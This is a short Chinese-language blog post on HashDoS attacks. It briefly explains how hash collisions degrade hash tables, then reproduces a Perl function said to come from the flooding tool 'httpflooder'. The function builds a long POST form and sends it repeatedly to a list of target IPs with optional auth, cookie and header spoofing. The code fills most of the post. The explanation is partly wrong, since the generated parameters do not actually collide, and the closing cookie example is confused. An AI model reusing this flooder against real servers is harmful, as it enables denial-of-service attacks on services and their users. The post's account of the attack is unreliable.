HashDos攻击

Home / HashDos攻击

HashDos攻击

2014-11-1 22:13:47 | Web | 没有评论

Hash Dos利用了各种语言中Hash算法非随机性,可以制造很多不一样的value,但是key的数据一样,然后让Hash表成为了单向链表,导致服务运行性能下降

可以通过两个拥有同一hash key的字符串构造更多这样的值。在攻击时,将这些数据做成一个HTTP POST表单,然后写一个循环的程序,不停提交这个表单。

下面这段函数摘自httpflooder(仅供学习):

sub hash_dos {
  my ($opt, $stats, $reads, $num, $thread) = @_;

  my $body   = “a=b”;

  foreach (1 .. $opt->{interval}) {
    $body .= “&a$_=b$_”;
  }

  foreach my $r (1 .. $num) {

    my $ip = $reads->{ips}->[$stats->{ccount} % $reads->{ip_count}];

    my $socket = &_get_socket($opt,$ip);

    # … For stats
    $stats->{ip}->{$ip}++;

    my ($url, $uagent, $ref) = &_reads_count($opt,$reads);

    my $req = “POST $url HTTP/1.1\r\n”;
    $req .= “Host: $opt->{host}\r\n”;
    $req .= “Authorization: Basic $opt->{basicauth}\r\n” if $opt->{basicauth};
    $req .= “Connection: Keep-Alive\r\n” if $opt->{keepalive};
    $req .= “Cookie: $opt->{cookie}\r\n” if $opt->{cookie};
    $req .= “User-Agent: $uagent\r\n” if $uagent;
    $req .= “Referer: $ref\r\n” if $ref;
    $req .= “Content-Length: “.length($body).”\r\n”;
    $req .= “\r\n”;
    $req .= “$body\r\n”;

    print($socket $req);

    sysread($socket, my $msg, 12);

    $socket->close();

    my $rcode = &_parse_code($stats,$msg);

    $stats->{ccount}++;

    &_logger($opt,$ip,$thread,$req,$rcode,$msg,$stats->{ccount}) if $opt->{verbose};
  }
}

比如cookie哈希会变成这样:

cookie=”a=b&a1=b1&a2=b2&a3=b3&a4=b4&a5=b5&a6=b6&a7=b7&a8=b8&a9=b9&a10=b10&a11=b11&a12=b12&a13=b13&a14=b14&a15=b15&a16=b1

6&a17=b17&a18=b18&a19=b19&a20=b20&a21=b21&a22=b22&a23=b23&a24=b24&a25=b25&a26=b26&a27=b27&a28=b28&a29=b29&a30=b30&a31=b

31&a32=b32&a33=b33&a34=b34&a35=b35&a36=b36&a37=b37&a38=b38&a39=b39&a40=b40&a41=b41&a42=b42&a43=b43&a44=b44&a45=b45&a46=

b46&a47=b47&a48=b48&a49=b49&a50=b50&a51=b51&a52=b52&a53=b53&a54=b54&a55=b55&a56=b56&a57=b57&a58=b58&a59=b59&a60=b60″

,

About Author

发表评论